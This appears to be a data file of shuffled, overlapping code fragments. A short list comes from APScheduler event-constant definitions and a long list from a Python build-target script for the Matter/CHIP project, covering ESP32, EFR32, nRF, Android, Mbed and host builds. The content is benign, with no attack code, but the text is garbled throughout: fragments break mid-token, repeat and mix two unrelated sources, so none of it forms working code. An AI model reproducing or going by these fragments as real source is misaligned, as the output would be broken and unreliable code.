EVENT_SCHEDULER_PAUSED =", "| EVENT_JOB_EXECUTED | EVENT_JOB_ERROR | EVENT_JOB_MISSED | EVENT_JOB_SUBMITTED | EVENT_JOB_MAX_INSTANCES)", "2 ** 13 EVENT_JOB_MISSED = 2 ** 14 EVENT_JOB_SUBMITTED =", "EVENT_SCHEDULER_RESUMED | EVENT_EXECUTOR_ADDED | EVENT_EXECUTOR_REMOVED | EVENT_JOBSTORE_ADDED | EVENT_JOBSTORE_REMOVED |", "= 2 ** 8 EVENT_JOB_ADDED = 2 ** 9 
EVENT_JOB_REMOVED", "4 EVENT_EXECUTOR_REMOVED = 2 ** 5 EVENT_JOBSTORE_ADDED = 2 **", "= (EVENT_SCHEDULER_STARTED | EVENT_SCHEDULER_SHUTDOWN | EVENT_SCHEDULER_PAUSED | EVENT_SCHEDULER_RESUMED | EVENT_EXECUTOR_ADDED", "** 11 EVENT_JOB_EXECUTED = 2 ** 12 EVENT_JOB_ERROR = 2", "EVENT_JOB_MISSED = 2 ** 14 EVENT_JOB_SUBMITTED = 2 ** 15", "13 EVENT_JOB_MISSED = 2 ** 14 EVENT_JOB_SUBMITTED = 2 **", "EVENT_ALL = (EVENT_SCHEDULER_STARTED | EVENT_SCHEDULER_SHUTDOWN | EVENT_SCHEDULER_PAUSED | EVENT_SCHEDULER_RESUMED |", "| EVENT_ALL_JOBS_REMOVED | EVENT_JOB_ADDED | EVENT_JOB_REMOVED | EVENT_JOB_MODIFIED | EVENT_JOB_EXECUTED", "| EVENT_JOBSTORE_REMOVED | EVENT_ALL_JOBS_REMOVED | EVENT_JOB_ADDED | EVENT_JOB_REMOVED | EVENT_JOB_MODIFIED", "= 2 ** 7 EVENT_ALL_JOBS_REMOVED = 2 ** 8 EVENT_JOB_ADDED", "| EVENT_JOB_REMOVED | EVENT_JOB_MODIFIED | EVENT_JOB_EXECUTED | EVENT_JOB_ERROR | EVENT_JOB_MISSED", "EVENT_JOB_MODIFIED | EVENT_JOB_EXECUTED | EVENT_JOB_ERROR | EVENT_JOB_MISSED | EVENT_JOB_SUBMITTED |", "EVENT_SCHEDULER_PAUSED | EVENT_SCHEDULER_RESUMED | EVENT_EXECUTOR_ADDED | EVENT_EXECUTOR_REMOVED | EVENT_JOBSTORE_ADDED |", "5 EVENT_JOBSTORE_ADDED = 2 ** 6 EVENT_JOBSTORE_REMOVED = 2 **", "EVENT_JOB_EXECUTED = 2 ** 12 EVENT_JOB_ERROR = 2 ** 13", "EVENT_JOBSTORE_ADDED = 2 ** 6 EVENT_JOBSTORE_REMOVED = 2 ** 7", "8 EVENT_JOB_ADDED = 2 ** 9 EVENT_JOB_REMOVED = 2 **", "| EVENT_EXECUTOR_REMOVED | EVENT_JOBSTORE_ADDED | EVENT_JOBSTORE_REMOVED | EVENT_ALL_JOBS_REMOVED | EVENT_JOB_ADDED", "EVENT_SCHEDULER_PAUSED = 2 ** 2 EVENT_SCHEDULER_RESUMED = 2 ** 3", "= 2 ** 4 EVENT_EXECUTOR_REMOVED = 2 ** 5 EVENT_JOBSTORE_ADDED", "6 EVENT_JOBSTORE_REMOVED = 2 ** 7 EVENT_ALL_JOBS_REMOVED = 2 **", "7 EVENT_ALL_JOBS_REMOVED = 2 ** 8 EVENT_JOB_ADDED = 2 **" ]
[ "profile=MbedProfile.DEBUG).GlobBlacklist( 'Compile only for debugging purpose - ' 'https://os.mbed.com/docs/mbed-os/latest/program-setup/build-profiles-and-rules.html') def", "2.0 (the \"License\"); # you may not use this file", "(a.name in b.conflicts) or (b.name in a.conflicts): return True return", "from builders.cc13x2x7_26x2x7 import cc13x2x7_26x2x7App, cc13x2x7_26x2x7Builder from builders.cyw30739 import Cyw30739App, Cyw30739Board,", "yield target.Extend('arm64-chip-test', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TEST) yield target.Extend('androidstudio-arm-chip-tool', board=AndroidBoard.AndroidStudio_ARM, app=AndroidApp.CHIP_TOOL) yield target.Extend('androidstudio-arm64-chip-tool',", "new build variant \"\"\" clone = self.Clone() clone.name += \"-\"", "str, output_prefix: str, enable_flashbundle: bool): builder = self.builder_class( repository_path, runner=runner,", "variant_target.IsGlobBlacklisted: variant_target = variant_target.GlobBlacklist( 'Reduce default build variants') yield variant_target", "'chip-tool-darwin', app=HostApp.CHIP_TOOL_DARWIN)) app_targets.append(target.Extend('chip-tool', app=HostApp.CHIP_TOOL)) app_targets.append(target.Extend('thermostat', app=HostApp.THERMOSTAT)) app_targets.append(target.Extend('minmdns', app=HostApp.MIN_MDNS)) app_targets.append(target.Extend('light', app=HostApp.LIGHT))", "QpgBoard, QpgBuilder from builders.telink import TelinkApp, TelinkBoard, TelinkBuilder from builders.tizen", "app_targets.append(target.Extend('thermostat', app=HostApp.THERMOSTAT)) app_targets.append(target.Extend('minmdns', app=HostApp.MIN_MDNS)) app_targets.append(target.Extend('light', app=HostApp.LIGHT)) app_targets.append(target.Extend('lock', app=HostApp.LOCK)) app_targets.append(target.Extend('shell', app=HostApp.SHELL))", "user requested'), efr_target.Extend('brd4166a', board=Efr32Board.BRD4166A).GlobBlacklist( 'only user requested'), efr_target.Extend('brd4170a', board=Efr32Board.BRD4170A).GlobBlacklist( 'only", "Check that item.requires is satisfied for all items in the", "# note the clone in case the default arg is", "args not forwarded to proto compiler. 
' 'https://pigweed-review.googlesource.com/c/pigweed/pigweed/+/66760') yield rpc", "and '-no-interactive' not in target.name: # Interactive builds will not", "given list \"\"\" available = set([item.name for item in items])", "yield test_target.Extend(board.BoardName() + '-tests', board=board, app=HostApp.TESTS) def Esp32Targets(): esp32_target =", "= variant_target.GlobBlacklist( 'Reduce default build variants') yield variant_target def HostTargets():", "and what arguments are required to produce the specified build)", "conflicts: List[str] = [], requires: List[str] = [], **buildargs): self.name", "InfineonBuilder from builders.k32w import K32WApp, K32WBuilder from builders.mbed import MbedApp,", "Target('esp32', Esp32Builder) yield esp32_target.Extend('m5stack-all-clusters', board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS) yield esp32_target.Extend('m5stack-all-clusters-ipv6only', board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS,", "esp32_target.Extend('devkitc', board=Esp32Board.DevKitC) yield devkitc.Extend('all-clusters', app=Esp32App.ALL_CLUSTERS) yield devkitc.Extend('all-clusters-ipv6only', app=Esp32App.ALL_CLUSTERS, enable_ipv4=False) yield", "variant_count in range(1, len(ok_variants) + 1): for subgroup in combinations(ok_variants,", "and 'chip-tool' in target.name and 'arm64' in target.name and '-no-interactive'", "extra_tests=True), builder.WhitelistVariantNameForGlob('no-interactive-ipv6only') builder.WhitelistVariantNameForGlob('ipv6only') for target in app_targets: if ('-rpc-console' in", "is exponential here. builder = VariantBuilder() builder.AppendVariant(name=\"no-ble\", enable_ble=False) builder.AppendVariant(name=\"no-wifi\", enable_wifi=False)", "target.name): # Single-variant builds yield target else: builder.targets.append(target) for target", "app=Efr32App.UNIT_TEST)) builder.targets.append( board_target.Extend('light', app=Efr32App.LIGHT)) builder.targets.append(board_target.Extend('lock', app=Efr32App.LOCK)) # Possible build variants.", "HostBuilder) target_native = target.Extend(HostBoard.NATIVE.BoardName(), board=HostBoard.NATIVE) targets = [target_native] # x64", "yield target.Extend('pump-controller', app=cc13x2x7_26x2x7App.PUMP_CONTROLLER) yield target.Extend('all-clusters', app=cc13x2x7_26x2x7App.ALL_CLUSTERS) yield target.Extend('shell', app=cc13x2x7_26x2x7App.SHELL) def", "yield esp32_target.Extend('qemu-tests', board=Esp32Board.QEMU, app=Esp32App.TESTS) def Efr32Targets(): efr_target = Target('efr32', Efr32Builder)", "extending its build parameters. Arguments: suffix: appended with a \"-\"", "TelinkBuilder from builders.tizen import TizenApp, TizenBoard, TizenBuilder from builders.bl602 import", "builder.AppendVariant(name=\"tsan\", conflicts=['asan'], use_tsan=True), builder.AppendVariant(name=\"asan\", conflicts=['tsan'], use_asan=True), builder.AppendVariant(name=\"libfuzzer\", requires=[ \"clang\"], use_libfuzzer=True),", "License for the specific language governing permissions and # limitations", "conflict resolution between build variants and globbing whitelist targets. 
\"\"\"", "board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS, enable_rpcs=True, enable_ipv4=False) yield esp32_target.Extend('c3devkit-all-clusters', board=Esp32Board.C3DevKit, app=Esp32App.ALL_CLUSTERS) devkitc =", "def Clone(self): \"\"\"Creates a clone of self.\"\"\" clone = Target(self.name,", "board in [HostBoard.NATIVE, HostBoard.FAKE]: yield test_target.Extend(board.BoardName() + '-tests', board=board, app=HostApp.TESTS)", "Enable nrf52840dongle for all-clusters and lighting app only yield target.Extend('nrf52840dongle-all-clusters',", "exponential here. builder = VariantBuilder() builder.AppendVariant(name=\"no-ble\", enable_ble=False) builder.AppendVariant(name=\"no-wifi\", enable_wifi=False) builder.AppendVariant(name=\"asan\",", "target in app_targets: yield target.Extend('release', profile=MbedProfile.RELEASE) yield target.Extend('develop', profile=MbedProfile.DEVELOP).GlobBlacklist( 'Compile", "# Only a few are whitelisted for globs name =", "app_targets.append(target.Extend('chip-tool', app=HostApp.CHIP_TOOL)) app_targets.append(target.Extend('thermostat', app=HostApp.THERMOSTAT)) app_targets.append(target.Extend('minmdns', app=HostApp.MIN_MDNS)) app_targets.append(target.Extend('light', app=HostApp.LIGHT)) app_targets.append(target.Extend('lock', app=HostApp.LOCK))", "self.glob_whitelist = [] def WhitelistVariantNameForGlob(self, name): \"\"\" Whitelist the specified", "requires def HasConflicts(items: List[BuildVariant]) -> bool: for a, b in", "target_native.Extend('chip-cert', app=HostApp.CERT_TOOL) yield target_native.Extend('address-resolve-tool', app=HostApp.ADDRESS_RESOLVE) yield target_native.Extend('address-resolve-tool-clang', app=HostApp.ADDRESS_RESOLVE, use_clang=True).GlobBlacklist(\"Reduce default", "efr_target = Target('efr32', Efr32Builder) board_targets = [ efr_target.Extend('brd4161a', board=Efr32Board.BRD4161A), efr_target.Extend('brd4163a',", "def __init__(self, substr: List[str]): self.substr = substr def Accept(self, name:", "created - no conflicts variant_target = target.Clone() for option in", "for target in app_targets: if ('-rpc-console' in target.name) or ('-python-bindings'", "user requested'), efr_target.Extend('brd4164a', board=Efr32Board.BRD4164A).GlobBlacklist( 'only user requested'), efr_target.Extend('brd4166a', board=Efr32Board.BRD4166A).GlobBlacklist( 'only", "= self.Clone() clone.name += \"-\" + suffix clone.create_kw_args.update(kargs) return clone", "target.name and '-no-interactive' not in target.name: # Interactive builds will", "target.Extend('nrf52840dongle-light', board=NrfBoard.NRF52840DONGLE, app=NrfApp.LIGHT) for target in targets: yield target.Extend('all-clusters', app=NrfApp.ALL_CLUSTERS)", "the specified variant to be allowed for globbing. 
By default", "import AmebaApp, AmebaBoard, AmebaBuilder from builders.android import AndroidApp, AndroidBoard, AndroidBuilder", "app=AndroidApp.CHIP_TV_CASTING_APP) yield target.Extend('arm-chip-tv-casting-app', board=AndroidBoard.ARM, app=AndroidApp.CHIP_TV_CASTING_APP) def MbedTargets(): target = Target('mbed',", "requirement not in available: return False return True class VariantBuilder:", "builds is exponential here builder.AppendVariant(name=\"same-event-loop\", validator=AcceptNameWithSubstrings( ['-chip-tool', '-chip-tool-darwin']), separate_event_loop=False), builder.AppendVariant(name=\"no-interactive\",", "\"\"\" Check that item.requires is satisfied for all items in", "board=AndroidBoard.ARM, app=AndroidApp.CHIP_TOOL) yield target.Extend('arm64-chip-tool', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TOOL) yield target.Extend('x64-chip-tool', board=AndroidBoard.X64, app=AndroidApp.CHIP_TOOL)", "builders.k32w import K32WApp, K32WBuilder from builders.mbed import MbedApp, MbedBoard, MbedBuilder,", "clone = Target(self.name, self.builder_class, **self.create_kw_args.copy()) clone.glob_blacklist_reason = self.glob_blacklist_reason return clone", "possible variant for variant_count in range(1, len(ok_variants) + 1): for", "from typing import List from builders.ameba import AmebaApp, AmebaBoard, AmebaBuilder", "clone = self.Clone() clone.name += \"-\" + suffix clone.create_kw_args.update(kargs) return", "builds will not compile by default on arm cross compiles", "= name self.validator = validator self.conflicts = conflicts self.buildargs =", "ameba_target = Target('ameba', AmebaBuilder) yield ameba_target.Extend('amebad-all-clusters', board=AmebaBoard.AMEBAD, app=AmebaApp.ALL_CLUSTERS) yield ameba_target.Extend('amebad-light',", "target = Target('cc13x2x7_26x2x7', cc13x2x7_26x2x7Builder) yield target.Extend('lock-ftd', app=cc13x2x7_26x2x7App.LOCK, openthread_ftd=True) yield target.Extend('lock-mtd',", "whitelist targets. \"\"\" for target in self.targets: yield target #", "case the default arg is used self.targets = targets[:] self.variants", "if (a.name in b.conflicts) or (b.name in a.conflicts): return True", "return builder def GlobBlacklist(self, reason): clone = self.Clone() if clone.glob_blacklist_reason:", "compiler. ' 'https://pigweed-review.googlesource.com/c/pigweed/pigweed/+/66760') yield rpc def AndroidTargets(): target = Target('android',", "app=QpgApp.LIGHT) yield target.Extend('shell', board=QpgBoard.QPG6105, app=QpgApp.SHELL) yield target.Extend('persistent-storage', board=QpgBoard.QPG6105, app=QpgApp.PERSISTENT_STORAGE) def", "Target ready to be created - no conflicts variant_target =", "OF ANY KIND, either express or implied. # See the", "board=NrfBoard.NRF52840DONGLE, app=NrfApp.ALL_CLUSTERS) yield target.Extend('nrf52840dongle-light', board=NrfBoard.NRF52840DONGLE, app=NrfApp.LIGHT) for target in targets:", "See the License for the specific language governing permissions and", "enable_ipv4=False) \"\"\" self.variants.append(BuildVariant(**args)) def AllVariants(self): \"\"\" Yields a list of", "substr: List[str]): self.substr = substr def Accept(self, name: str): for", "target.Extend('persistent-storage', board=QpgBoard.QPG6105, app=QpgApp.PERSISTENT_STORAGE) def TizenTargets(): # Possible build variants. 
#", "all-clusters and lighting app only yield target.Extend('nrf52840dongle-all-clusters', board=NrfBoard.NRF52840DONGLE, app=NrfApp.ALL_CLUSTERS) yield", "app=Cyw30739App.LIGHT) yield Target('cyw30739-cyw930739m2evb_01-lock', Cyw30739Builder, board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.LOCK) yield Target('cyw30739-cyw930739m2evb_01-ota-requestor', Cyw30739Builder, board=Cyw30739Board.CYW930739M2EVB_01,", "to in writing, software # distributed under the License is", "release=True) yield target.Extend('thermostat-release', app=IMXApp.THERMOSTAT, release=True) yield target.Extend('all-clusters-app-release', app=IMXApp.ALL_CLUSTERS, release=True) yield", "target.Extend('ota-provider-app', app=IMXApp.OTA_PROVIDER) yield target.Extend('chip-tool-release', app=IMXApp.CHIP_TOOL, release=True) yield target.Extend('lighting-app-release', app=IMXApp.LIGHT, release=True)", "self.substr = substr def Accept(self, name: str): for s in", "continue # Target ready to be created - no conflicts", "or agreed to in writing, software # distributed under the", "cross compile cross_compile = (HostBoard.NATIVE.PlatformName() == 'linux') and (HostBoard.NATIVE.BoardName() !=", "yield target.Extend('lighting-app-release', app=IMXApp.LIGHT, release=True) yield target.Extend('thermostat-release', app=IMXApp.THERMOSTAT, release=True) yield target.Extend('all-clusters-app-release',", "self.glob_blacklist_reason = None self.create_kw_args = kwargs def Clone(self): \"\"\"Creates a", "IsGlobBlacklisted(self): return self.glob_blacklist_reason is not None @property def GlobBlacklistReason(self): return", "enable_ble=False), builder.AppendVariant(name=\"no-wifi\", enable_wifi=False), builder.AppendVariant(name=\"tsan\", conflicts=['asan'], use_tsan=True), builder.AppendVariant(name=\"asan\", conflicts=['tsan'], use_asan=True), builder.AppendVariant(name=\"libfuzzer\",", "app=InfineonApp.LOCK) yield target.Extend('p6-all-clusters', board=InfineonBoard.P6BOARD, app=InfineonApp.ALL_CLUSTERS) yield target.Extend('p6-light', board=InfineonBoard.P6BOARD, app=InfineonApp.LIGHT) def", "app=K32WApp.LIGHT, release=True, disable_ble=True, se05x=True).GlobBlacklist(\"Only on demand build\") yield target.Extend('light-release-no-ota', app=K32WApp.LIGHT,", "target.Extend('p6-light', board=InfineonBoard.P6BOARD, app=InfineonApp.LIGHT) def AmebaTargets(): ameba_target = Target('ameba', AmebaBuilder) yield", "between build variants and globbing whitelist targets. 
\"\"\" for target", "class VariantBuilder: \"\"\"Handles creating multiple build variants based on a", "board=AmebaBoard.AMEBAD, app=AmebaApp.LIGHT) yield ameba_target.Extend('amebad-pigweed', board=AmebaBoard.AMEBAD, app=AmebaApp.PIGWEED) def K32WTargets(): target =", "few are whitelisted for globs name = '-'.join([o.name for o", "from builders.cyw30739 import Cyw30739App, Cyw30739Board, Cyw30739Builder from builders.efr32 import Efr32App,", "List[Target] = []): # note the clone in case the", "builder = VariantBuilder() for board_target in board_targets: builder.targets.append(board_target.Extend( 'window-covering', app=Efr32App.WINDOW_COVERING))", "AmebaTargets(): ameba_target = Target('ameba', AmebaBuilder) yield ameba_target.Extend('amebad-all-clusters', board=AmebaBoard.AMEBAD, app=AmebaApp.ALL_CLUSTERS) yield", "targets: yield target.Extend('all-clusters', app=NrfApp.ALL_CLUSTERS) yield target.Extend('lock', app=NrfApp.LOCK) yield target.Extend('light', app=NrfApp.LIGHT)", "for requirement in item.requires: if requirement not in available: return", "'-no-interactive' not in target.name: # Interactive builds will not compile", "**buildargs): self.name = name self.validator = validator self.conflicts = conflicts", "compliance with the License. # You may obtain a copy", "def TizenTargets(): # Possible build variants. # NOTE: The number", "# builds is exponential here builder.AppendVariant(name=\"same-event-loop\", validator=AcceptNameWithSubstrings( ['-chip-tool', '-chip-tool-darwin']), separate_event_loop=False),", "in a.conflicts): return True return False def AllRequirementsMet(items: List[BuildVariant]) ->", "\" clone.glob_blacklist_reason += reason else: clone.glob_blacklist_reason = reason return clone", "= self.glob_blacklist_reason return clone def Extend(self, suffix, **kargs): \"\"\"Creates a", "target = Target('bl602', Bl602Builder) yield target.Extend('light', board=Bl602Board.BL602BOARD, app=Bl602App.LIGHT) def IMXTargets():", "not in self.glob_whitelist: if not variant_target.IsGlobBlacklisted: variant_target = variant_target.GlobBlacklist( 'Reduce", "self.glob_whitelist.append(name) def AppendVariant(self, **args): \"\"\" Add another variant to accepted", "s in name: return True return False class BuildVariant: def", "and globbing whitelist targets. 
\"\"\" for target in self.targets: yield", "1): for subgroup in combinations(ok_variants, variant_count): if HasConflicts(subgroup): continue if", "enable_rpcs=True) if '-nrf5340dk-' in rpc.name: rpc = rpc.GlobBlacklist( 'Compile failure", "board=NrfBoard.NRF52840DONGLE, app=NrfApp.LIGHT) for target in targets: yield target.Extend('all-clusters', app=NrfApp.ALL_CLUSTERS) yield", "to use and what arguments are required to produce the", "not use this file except in compliance with the License.", "board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TV_CASTING_APP) yield target.Extend('arm-chip-tv-casting-app', board=AndroidBoard.ARM, app=AndroidApp.CHIP_TV_CASTING_APP) def MbedTargets(): target =", "AndroidBuilder) yield target.Extend('arm-chip-tool', board=AndroidBoard.ARM, app=AndroidApp.CHIP_TOOL) yield target.Extend('arm64-chip-tool', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TOOL) yield", "target = Target('k32w', K32WBuilder) yield target.Extend('light-ota-se', app=K32WApp.LIGHT, release=True, disable_ble=True, se05x=True).GlobBlacklist(\"Only", "for target in targets: app_targets.append(target.Extend('lock', app=MbedApp.LOCK)) app_targets.append(target.Extend('light', app=MbedApp.LIGHT)) app_targets.append(target.Extend( 'all-clusters',", "import List from builders.ameba import AmebaApp, AmebaBoard, AmebaBuilder from builders.android", "a clone of self.\"\"\" clone = Target(self.name, self.builder_class, **self.create_kw_args.copy()) clone.glob_blacklist_reason", "you may not use this file except in compliance with", "def MbedTargets(): target = Target('mbed', MbedBuilder) targets = [ target.Extend('CY8CPROTO_062_4343W',", "target.Extend('lighting-app-release', app=IMXApp.LIGHT, release=True) yield target.Extend('thermostat-release', app=IMXApp.THERMOSTAT, release=True) yield target.Extend('all-clusters-app-release', app=IMXApp.ALL_CLUSTERS,", "Clone(self): \"\"\"Creates a clone of self.\"\"\" clone = Target(self.name, self.builder_class,", "\"\"\"Handles creating multiple build variants based on a starting target.", "\"\"\"Represents a build target: Has a name identifier plus parameters", "board_targets: builder.targets.append(board_target.Extend( 'window-covering', app=Efr32App.WINDOW_COVERING)) builder.targets.append(board_target.Extend( 'switch', app=Efr32App.SWITCH)) builder.targets.append(board_target.Extend( 'unit-test', app=Efr32App.UNIT_TEST))", "return clone def Extend(self, suffix, **kargs): \"\"\"Creates a clone of", "from builders.infineon import InfineonApp, InfineonBoard, InfineonBuilder from builders.k32w import K32WApp,", "not in target.name: # Interactive builds will not compile by", "TizenBuilder from builders.bl602 import Bl602App, Bl602Board, Bl602Builder from builders.imx import", "app=AndroidApp.CHIP_TVServer) yield target.Extend('x64-chip-tvserver', board=AndroidBoard.X64, app=AndroidApp.CHIP_TVServer) yield target.Extend('arm64-chip-tv-casting-app', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TV_CASTING_APP) yield", "is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES", "AndroidBoard, AndroidBuilder from builders.cc13x2x7_26x2x7 import cc13x2x7_26x2x7App, cc13x2x7_26x2x7Builder from builders.cyw30739 import", "NrfConnectBuilder from builders.qpg import QpgApp, QpgBoard, QpgBuilder from builders.telink import", "return True class AcceptNameWithSubstrings: def __init__(self, substr: List[str]): self.substr =", "HostBuilder) for board in [HostBoard.NATIVE, HostBoard.FAKE]: yield test_target.Extend(board.BoardName() + '-tests',", "some builds 
app_targets.append( target_native.Extend('rpc-console', app=HostApp.RPC_CONSOLE)) app_targets.append( target_native.Extend('tv-app', app=HostApp.TV_APP)) app_targets.append( target_native.Extend('tv-casting-app',", "whitelisted for globs name = '-'.join([o.name for o in subgroup])", "libreadline is not part of the default sysroot yield target.GlobBlacklist('Arm", "\"\"\" self.variants.append(BuildVariant(**args)) def AllVariants(self): \"\"\" Yields a list of acceptable", "or ('nl-test-runner' in target.name): # Single-variant builds yield target else:", "devkitc.Extend('temperature-measurement', app=Esp32App.TEMPERATURE_MEASUREMENT) yield devkitc.Extend('temperature-measurement-rpc', app=Esp32App.TEMPERATURE_MEASUREMENT, enable_rpcs=True) yield esp32_target.Extend('qemu-tests', board=Esp32Board.QEMU, app=Esp32App.TESTS)", "\"-\" as separator to the clone name **kargs: arguments needed", "requested') ] builder = VariantBuilder() for board_target in board_targets: builder.targets.append(board_target.Extend(", "app=IMXApp.CHIP_TOOL, release=True) yield target.Extend('lighting-app-release', app=IMXApp.LIGHT, release=True) yield target.Extend('thermostat-release', app=IMXApp.THERMOSTAT, release=True)", "target.Extend('light', app=NrfApp.LIGHT) yield target.Extend('shell', app=NrfApp.SHELL) yield target.Extend('pump', app=NrfApp.PUMP) yield target.Extend('pump-controller',", "are whitelisted for globs name = '-'.join([o.name for o in", "for target in builder.AllVariants(): if cross_compile and 'chip-tool' in target.name", "# Possible build variants. Note that number of potential #", "target.name) or ('-python-bindings' in target.name) or ('nl-test-runner' in target.name): #", "MbedTargets(): target = Target('mbed', MbedBuilder) targets = [ target.Extend('CY8CPROTO_062_4343W', board=MbedBoard.CY8CPROTO_062_4343W),", "items: for requirement in item.requires: if requirement not in available:", "app=TelinkApp.SWITCH)) # have a consistent order overall ALL.sort(key=lambda t: t.name)", "Esp32Builder from builders.host import HostApp, HostBoard, HostBuilder from builders.infineon import", "of potential # builds is exponential here builder.AppendVariant(name=\"same-event-loop\", validator=AcceptNameWithSubstrings( ['-chip-tool',", "in case the default arg is used self.targets = targets[:]", "the clone in case the default arg is used self.targets", "Target('tizen-arm', TizenBuilder, board=TizenBoard.ARM) builder.targets.append(target.Extend('light', app=TizenApp.LIGHT)) for target in builder.AllVariants(): yield", "glob-blacklisted. 
\"\"\" self.glob_whitelist.append(name) def AppendVariant(self, **args): \"\"\" Add another variant", "app_targets.append(target.Extend( 'all-clusters', app=HostApp.ALL_CLUSTERS)) if (HostBoard.NATIVE.PlatformName() == 'darwin'): app_targets.append(target.Extend( 'chip-tool-darwin', app=HostApp.CHIP_TOOL_DARWIN))", "Esp32Targets(): esp32_target = Target('esp32', Esp32Builder) yield esp32_target.Extend('m5stack-all-clusters', board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS) yield", "import QpgApp, QpgBoard, QpgBuilder from builders.telink import TelinkApp, TelinkBoard, TelinkBuilder", "Esp32Targets(), Efr32Targets(), NrfTargets(), AndroidTargets(), MbedTargets(), InfineonTargets(), AmebaTargets(), K32WTargets(), cc13x2x7_26x2x7Targets(), Cyw30739Targets(),", "AndroidBuilder from builders.cc13x2x7_26x2x7 import cc13x2x7_26x2x7App, cc13x2x7_26x2x7Builder from builders.cyw30739 import Cyw30739App,", "__init__(self, substr: List[str]): self.substr = substr def Accept(self, name: str):", "QorvoTargets(): target = Target('qpg', QpgBuilder) yield target.Extend('lock', board=QpgBoard.QPG6105, app=QpgApp.LOCK) yield", "by default on arm cross compiles # because libreadline is", "buildargs self.requires = requires def HasConflicts(items: List[BuildVariant]) -> bool: for", "yield target.Extend('nrf52840dongle-all-clusters', board=NrfBoard.NRF52840DONGLE, app=NrfApp.ALL_CLUSTERS) yield target.Extend('nrf52840dongle-light', board=NrfBoard.NRF52840DONGLE, app=NrfApp.LIGHT) for target", "app=AmebaApp.LIGHT) yield ameba_target.Extend('amebad-pigweed', board=AmebaBoard.AMEBAD, app=AmebaApp.PIGWEED) def K32WTargets(): target = Target('k32w',", "target.Extend('lock-mtd', app=cc13x2x7_26x2x7App.LOCK, openthread_ftd=False) yield target.Extend('pump', app=cc13x2x7_26x2x7App.PUMP) yield target.Extend('pump-controller', app=cc13x2x7_26x2x7App.PUMP_CONTROLLER) yield", "target.Extend('arm-chip-tvserver', board=AndroidBoard.ARM, app=AndroidApp.CHIP_TVServer) yield target.Extend('x86-chip-tvserver', board=AndroidBoard.X86, app=AndroidApp.CHIP_TVServer) yield target.Extend('x64-chip-tvserver', board=AndroidBoard.X64,", "\"\"\" clone = self.Clone() clone.name += \"-\" + suffix clone.create_kw_args.update(kargs)", "import Esp32App, Esp32Board, Esp32Builder from builders.host import HostApp, HostBoard, HostBuilder", "ready to be created - no conflicts variant_target = target.Clone()", "= builder_class self.glob_blacklist_reason = None self.create_kw_args = kwargs def Clone(self):", "builders.bl602 import Bl602App, Bl602Board, Bl602Builder from builders.imx import IMXApp, IMXBuilder", "target.Extend('x86-chip-tool', board=AndroidBoard.X86, app=AndroidApp.CHIP_TOOL) yield target.Extend('arm64-chip-test', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TEST) yield target.Extend('androidstudio-arm-chip-tool', board=AndroidBoard.AndroidStudio_ARM,", "yield target.Extend('light-ota-se', app=K32WApp.LIGHT, release=True, disable_ble=True, se05x=True).GlobBlacklist(\"Only on demand build\") yield", "yield target_native.Extend('address-resolve-tool', app=HostApp.ADDRESS_RESOLVE) yield target_native.Extend('address-resolve-tool-clang', app=HostApp.ADDRESS_RESOLVE, use_clang=True).GlobBlacklist(\"Reduce default build variants\")", "app=InfineonApp.LIGHT) def AmebaTargets(): ameba_target = Target('ameba', AmebaBuilder) yield ameba_target.Extend('amebad-all-clusters', board=AmebaBoard.AMEBAD,", "app=Esp32App.ALL_CLUSTERS) devkitc = esp32_target.Extend('devkitc', board=Esp32Board.DevKitC) yield devkitc.Extend('all-clusters', 
class AcceptAnyName:
    def Accept(self, name: str):
        return True


class AcceptNameWithSubstrings:
    def __init__(self, substr: List[str]):
        self.substr = substr

    def Accept(self, name: str):
        for s in self.substr:
            if s in name:
                return True
        return False


class BuildVariant:
    def __init__(self, name: str, validator=AcceptAnyName(),
                 conflicts: List[str] = [], requires: List[str] = [],
                 **buildargs):
        self.name = name
        self.validator = validator
        self.conflicts = conflicts
        self.buildargs = buildargs
        self.requires = requires


def HasConflicts(items: List[BuildVariant]) -> bool:
    for a, b in combinations(items, 2):
        if (a.name in b.conflicts) or (b.name in a.conflicts):
            return True
    return False


def AllRequirementsMet(items: List[BuildVariant]) -> bool:
    """Check that item.requires is satisfied for all items in the given list."""
    available = set([item.name for item in items])

    for item in items:
        for requirement in item.requires:
            if requirement not in available:
                return False

    return True


class VariantBuilder:
    """Handles creating multiple build variants based on a starting target."""

    def __init__(self, targets: List[Target] = []):
        # note the clone in case the default arg is used
        self.targets = targets[:]
        self.variants = []
        self.glob_whitelist = []

    def WhitelistVariantNameForGlob(self, name):
        """Whitelist the specified variant to be allowed for globbing.

        By default we do not want a 'build all' to select all variants, so
        variants are generally glob-blacklisted.
        """
        self.glob_whitelist.append(name)

    def AppendVariant(self, **args):
        """Add another variant to accepted variants.

        Arguments are construction variants to BuildVariant.
        Example usage:
           builder.AppendVariant(name="ipv6only", enable_ipv4=False)
        """
        self.variants.append(BuildVariant(**args))

    def AllVariants(self):
        """Yields a list of acceptable variants for the given targets.

        Handles conflict resolution between build variants and globbing
        whitelist targets.
        """
        for target in self.targets:
            yield target

            # skip variants that do not work for this target
            ok_variants = [
                v for v in self.variants if v.validator.Accept(target.name)]

            # Build every possible variant
            for variant_count in range(1, len(ok_variants) + 1):
                for subgroup in combinations(ok_variants, variant_count):
                    if HasConflicts(subgroup):
                        continue

                    if not AllRequirementsMet(subgroup):
                        continue

                    # Target ready to be created - no conflicts
                    variant_target = target.Clone()
                    for option in subgroup:
                        variant_target = variant_target.Extend(
                            option.name, **option.buildargs)

                    # Only a few are whitelisted for globs
                    name = '-'.join([o.name for o in subgroup])
                    if name not in self.glob_whitelist:
                        if not variant_target.IsGlobBlacklisted:
                            variant_target = variant_target.GlobBlacklist(
                                'Reduce default build variants')

                    yield variant_target
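# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the original file): how VariantBuilder fans
# one target out. Every non-conflicting subset of applicable variants becomes
# an extra build, so growth is exponential in the number of variants. The
# target name 'linux-x64-light' is hypothetical.
def _variant_fanout_demo():
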